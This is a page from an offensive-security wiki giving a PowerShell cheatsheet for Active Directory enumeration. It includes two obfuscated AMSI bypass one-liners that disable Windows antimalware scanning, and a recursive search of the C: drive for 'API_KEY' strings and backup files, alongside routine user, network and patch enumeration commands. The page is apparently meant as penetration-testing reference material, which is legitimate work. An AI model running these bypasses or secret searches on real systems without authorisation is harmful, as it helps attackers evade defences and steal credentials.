📄
Bufu-Sec Wiki
GithubTwitter
  • Bufu-Sec Wiki
  • Active Directory
    • General
      • General
      • Installation
      • DNS
      • Kerberos
      • Kerberos Delegation
    • Enumeration
      • AD Module
      • Bloodhound
      • PowerShell Cheatsheet
      • PowerView Cheatsheet
      • Users
      • Groups
      • Computers
      • OUs
      • GPOs
      • ACLs
      • Domains
      • Trusts
      • Forest Mappings
      • Files and Shares
      • Kerbrute
    • Privilege Escalation
      • Kerberoasting
      • AS-REP Roasting
      • Constrained Delegation
      • Unconstrained Delegation
      • DNS Admins
    • Lateral Movement
      • PS Remoting
      • Credential Dumping
      • DC Sync
      • Overpass the Hash
      • Ticket Harvesting
      • Pass the Ticket
    • Persistence
      • Golden Tickets
      • Silver Tickets
      • ACL Attacks
      • Custom SSPs
      • DC Shadow
      • Skeleton Key
      • DSRM
    • Trust Attacks
      • Cross Domain Attacks
      • Cross Forest Attacks
      • MSSQL Servers
    • MITM & Relay Attacks
      • LLMNR Poisoning
      • SMB Relay
      • IPv6 Attacks
    • Detection & Defense
      • Domain Admins
      • Architectural Changes
      • Microsoft ATA
Powered by GitBook
On this page
  • Security Features
  • Language Mode
  • AppLocker Policy
  • AMSI Bypasses
  • Users
  • Show Local Users
  • Show Number of Local Users
  • Get User by providing SID
  • Show Usernames and SIDs
  • Show Users that Do not Require a Password
  • Groups
  • Show Local Groups
  • Show Number of Local Groups
  • Networks
  • Get Network Adapter and IP Address Information
  • Show only IPv4 Addresses and Show Output in Table Format
  • Show Listening Ports
  • Computers & Files
  • Show Installed Patches
  • Show Information about Specific Patch
  • Search for Backup Files
  • Search for Files Containing Specific String
  • Get Running Processes
  • Get All Scheduled Tasks
  • Get Information about Specific Scheduled Task
  • Show Owner of File/Folder
  1. Active Directory
  2. Enumeration

PowerShell Cheatsheet

Security Features

Language Mode

$ExecutionContext.SessionState.LanguageMode

AppLocker Policy

Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections

AMSI Bypasses

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Users

Show Local Users

Get-LocalUser

Show Number of Local Users

Get-LocalUser | Measure-Object -line

Get User by providing SID

Get-LocalUser -SID "S-1-5-21-1394777289-3961777894-1791813945-501"

Show Usernames and SIDs

Get-LocalUser | Select-Object -Property Name,SID,Enabled

Show Users that Do not Require a Password

Get-LocalUser | Where-Object -Property PasswordRequired -Eq $False

Groups

Show Local Groups

Get-LocalGroup

Show Number of Local Groups

Get-LocalGroup | Measure-Object -line

Networks

Get Network Adapter and IP Address Information

Get-NetIPAddress

Show only IPv4 Addresses and Show Output in Table Format

Get-NetIPAddress -AddressFamily IPv4 | Format-Table
Get-NetIPAddress -AddressFamily IPv4 | ft

Show Listening Ports

Get-NetTCPConnection -State Listen

Computers & Files

Show Installed Patches

Get-HotFix

Show Information about Specific Patch

Get-HotFix -ID KB4023834

Search for Backup Files

Get-ChildItem -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue -Force
gci -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue -Force
ls -Path C:\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue -Force

Search for Files Containing Specific String

Get-ChildItem C:\* -Recurse | Select-String -pattern API_KEY

Get Running Processes

Get-Process

Get All Scheduled Tasks

Get-ScheduledTask

Get Information about Specific Scheduled Task

Get-ScheduledTask -TaskName "new-sched-task"

Show Owner of File/Folder

Get-ACL C:\
PreviousBloodhoundNextPowerView Cheatsheet

Last updated 2 years ago